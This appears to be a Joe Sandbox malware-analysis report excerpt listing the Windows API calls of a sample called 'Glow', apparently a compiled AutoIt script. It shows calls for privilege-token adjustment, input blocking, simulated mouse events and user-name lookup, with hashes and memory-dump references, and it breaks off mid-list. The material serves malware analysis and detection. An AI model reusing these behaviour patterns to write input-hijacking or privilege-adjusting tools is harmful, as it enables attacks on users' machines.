                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 577356006-0
                                                                                                                                                                          • Opcode ID: 19ede9564027914ac3631f5642faf5dd58cdf89fe639a5a424f8b6f8e73dac0b
                                                                                                                                                                          • Instruction ID: e7f3808caa56bcfd210c585b105299103e34892424a7badf487b5ca9fa4df21b
                                                                                                                                                                          • Opcode Fuzzy Hash: 19ede9564027914ac3631f5642faf5dd58cdf89fe639a5a424f8b6f8e73dac0b
                                                                                                                                                                          • Instruction Fuzzy Hash: D611BFB1810214BFD718AF64DCC6DABBBBCEB05710B20852EE45657291DB70BC41CA24
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002,00000000), ref: 003A5079
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002,00000000), ref: 003A5080
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 003A5092
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: adb7fad176802a8ac0cb429ab5078c8a0ddf0cf06d95757a907ad5de879c4746
                                                                                                                                                                          • Instruction ID: 16fdde013cdd7deced9112233e9f85a6c70a5db4a653df2750bbdd76054a89b8
                                                                                                                                                                          • Opcode Fuzzy Hash: adb7fad176802a8ac0cb429ab5078c8a0ddf0cf06d95757a907ad5de879c4746
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EE0EC72400548AFCF22AF54DD09E983B69EF51385F118124FD599A531DB35DD42CBC4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 003DE664
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                          • String ID: X64
                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                          • Opcode ID: 189288ccdbd4e123618c5bf4e49e647c3fc844e9d09583cbc17a6b94ddabb458
                                                                                                                                                                          • Instruction ID: f8f4ef30b34383b4490f3a5fa4dccdf3804088bd780a47669ee75c7edefcef11
                                                                                                                                                                          • Opcode Fuzzy Hash: 189288ccdbd4e123618c5bf4e49e647c3fc844e9d09583cbc17a6b94ddabb458
                                                                                                                                                                          • Instruction Fuzzy Hash: CED0C9F580111DEACF81CB90ECC8ED9777CBB04304F114662F146A2140D730A5488B14
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4229
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004052EE,?,?,00000035,?), ref: 003F4239
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                          • Opcode ID: e65804a1ae3d738c04fe496acf460a3e0e6bb26efbbab3798a1ce74d91b9d38c
                                                                                                                                                                          • Instruction ID: d95cdef5aa5470f3000ef4aebc9f34160acbc84e6a398b9760d093c25a77db78
                                                                                                                                                                          • Opcode Fuzzy Hash: e65804a1ae3d738c04fe496acf460a3e0e6bb26efbbab3798a1ce74d91b9d38c
                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0E5706003297AE72126659C4DFFB766DEFC5761F000175F609D2181DA709D00C7B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E1B48), ref: 003E1A20
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,003E1B48), ref: 003E1A35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                                          • Opcode ID: c395ca728d11fce4feec1c48ed6736110d351ba4836b3675d952eb730ffd68c0
                                                                                                                                                                          • Instruction ID: 156abfd73517d8ec11da9a49c77074d263db5575fe6f751e19f12cd8edb39c19
                                                                                                                                                                          • Opcode Fuzzy Hash: c395ca728d11fce4feec1c48ed6736110d351ba4836b3675d952eb730ffd68c0
                                                                                                                                                                          • Instruction Fuzzy Hash: AAE0BF76014620BFE7262B21FC05FB6BBA9EB04311F14892DF9A5844B0DB72AC91DB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 003FF51A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                          • Opcode ID: eb773a78723eb78e4746662d8b5a10edb06220ac28ffc8d5ccb2bd3db53b5c99
                                                                                                                                                                          • Instruction ID: 8be9fdd0958d8a1a6d327420930d621102cde17e719abc84bbf63b8a8f294287
                                                                                                                                                                          • Opcode Fuzzy Hash: eb773a78723eb78e4746662d8b5a10edb06220ac28ffc8d5ccb2bd3db53b5c99
                                                                                                                                                                          • Instruction Fuzzy Hash: EAE01A322102049FC711AF69D804A9AB7ECAFA5761B008466FD4ACB251DA70A9408BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003EEC95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                                          • Opcode ID: e5bd5c04b6d528ad9192e142f732378ec6bb60667f994ae298d270c73b15b4d4
                                                                                                                                                                          • Instruction ID: 7ae968352c165b74c16895ac7225d7d37322a71a59f79cdb9f14c7a46cb1e610
                                                                                                                                                                          • Opcode Fuzzy Hash: e5bd5c04b6d528ad9192e142f732378ec6bb60667f994ae298d270c73b15b4d4
                                                                                                                                                                          • Instruction Fuzzy Hash: D9D05EB61943B179E81F0A3E8F2FFF6090EE302741FA14349F202D99D5E5D1B9409129
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,003A075E), ref: 003A0D4A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 3908236829dbe82aebdb3d70f2f1cf2195cf57b5d67843230c22773273f32276
                                                                                                                                                                          • Instruction ID: 64460189f41b92825b0959d85252db16329e84c12a721f0b40c431517a9e502a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3908236829dbe82aebdb3d70f2f1cf2195cf57b5d67843230c22773273f32276
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040358D
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004035A0
                                                                                                                                                                          • DestroyWindow.USER32 ref: 004035AF
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004035CA
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 004035D1
                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00403700
                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0040370E
                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403755
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00403761
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040379D
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037BF
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037D2
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037DD
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004037E6
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004037F5
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004037FE
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403805
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00403810
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403822
                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00420C04,00000000), ref: 00403838
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00403848
                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0040386E
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0040388D
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004038AF
                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00403A9C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                          • Opcode ID: d9f0040c317efb0cfdd46e4754cdc5e55be8b6f79e6fba22c7fc051bbf72dfd2
                                                                                                                                                                          • Instruction ID: 760c4269d33600b9594576cd4e27296979cb126a0ad411f03694e2dec7e28a3f
                                                                                                                                                                          • Opcode Fuzzy Hash: d9f0040c317efb0cfdd46e4754cdc5e55be8b6f79e6fba22c7fc051bbf72dfd2
                                                                                                                                                                          • Instruction Fuzzy Hash: FA02AFB1900205AFDB14DF64CD89EAE7BB9FB49311F008569F915AB2A1CB78ED01CF64
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 003816B4
                                                                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 003C2B07
                                                                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003C2B40
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003C2F85
                                                                                                                                                                            • Part of subcall function 00381802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00381488,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 00381865
                                                                                                                                                                          • SendMessageW.USER32(?,00001053), ref: 003C2FC1
                                                                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003C2FD8
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 003C2FEE
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 003C2FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                          • String ID: 0$(E$(E$(E
                                                                                                                                                                          • API String ID: 2760611726-87863512
                                                                                                                                                                          • Opcode ID: 80a984ea8865917818306e999e5ccc4d20f9150ff34a8a8cb2834f69a0a98089
                                                                                                                                                                          • Instruction ID: b1e598c639948188dde6e7926fc9bccdee26808ef64adcd843b3b2471e1e1347
                                                                                                                                                                          • Opcode Fuzzy Hash: 80a984ea8865917818306e999e5ccc4d20f9150ff34a8a8cb2834f69a0a98089
                                                                                                                                                                          • Instruction Fuzzy Hash: 08128D70600301AFC726EF14C944FAABBE9BB45301F19856DF89ADB661C771EC82CB95
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00417B67
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00417B98
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00417BA4
                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00417BBE
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00417BCD
                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00417BF8
                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 00417C00
                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00417C07
                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00417C16
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00417C1D
                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00417C68
                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 00417C9A
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00417CBC
                                                                                                                                                                            • Part of subcall function 00417E22: GetSysColor.USER32(00000012), ref: 00417E5B
                                                                                                                                                                            • Part of subcall function 00417E22: SetTextColor.GDI32(?,00417B2D), ref: 00417E5F
                                                                                                                                                                            • Part of subcall function 00417E22: GetSysColorBrush.USER32(0000000F), ref: 00417E75
                                                                                                                                                                            • Part of subcall function 00417E22: GetSysColor.USER32(0000000F), ref: 00417E80
                                                                                                                                                                            • Part of subcall function 00417E22: GetSysColor.USER32(00000011), ref: 00417E9D
                                                                                                                                                                            • Part of subcall function 00417E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00417EAB
                                                                                                                                                                            • Part of subcall function 00417E22: SelectObject.GDI32(?,00000000), ref: 00417EBC
                                                                                                                                                                            • Part of subcall function 00417E22: SetBkColor.GDI32(?,?), ref: 00417EC5
                                                                                                                                                                            • Part of subcall function 00417E22: SelectObject.GDI32(?,?), ref: 00417ED2
                                                                                                                                                                            • Part of subcall function 00417E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00417EF1
                                                                                                                                                                            • Part of subcall function 00417E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00417F08
                                                                                                                                                                            • Part of subcall function 00417E22: GetWindowLongW.USER32(?,000000F0), ref: 00417F15
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4124339563-0
                                                                                                                                                                          • Opcode ID: b7b9ebef80335c16b0d78db60ea5c20495fecc41b4ef9e0e482423de7cfe487a
                                                                                                                                                                          • Instruction ID: d030567d5810c37a242cfdc0c0c7712296c4ac2315d30c33533fc2ae9a2cb62d
                                                                                                                                                                          • Opcode Fuzzy Hash: b7b9ebef80335c16b0d78db60ea5c20495fecc41b4ef9e0e482423de7cfe487a
                                                                                                                                                                          • Instruction Fuzzy Hash: 89A1A2B1408301BFC7119F64DC48EABBBBAFF48324F104A29F962961E0D779D985CB95
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0040319B
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004032C7
                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00403306
                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00403316
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0040335D
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00403369
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004033B2
                                                                                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004033C1
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 004033D1
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004033D5
                                                                                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004033E5
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004033EE
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004033F7
                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00403423
                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0040343A
                                                                                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0040347A
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0040348E
                                                                                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0040349F
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004034D4
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 004034DF
                                                                                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004034EA
                                                                                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004034F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                          • Opcode ID: 3a5690a019f76e8b9c2247612bb14e9459ee0626d9d9569a6404540777a1eed1
                                                                                                                                                                          • Instruction ID: 5fe58c02f5f894c568d9ae2ba454c767451c5f197d8088186a1bdbe9b46201bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a5690a019f76e8b9c2247612bb14e9459ee0626d9d9569a6404540777a1eed1
                                                                                                                                                                          • Instruction Fuzzy Hash: F7B15EB1A00215BFEB14DFA8CD45FAE7BA9EB09711F008165F915AB2D1C774ED40CB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 003F5532
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,0041DC30,?,\\.\,0041DCD0), ref: 003F560F
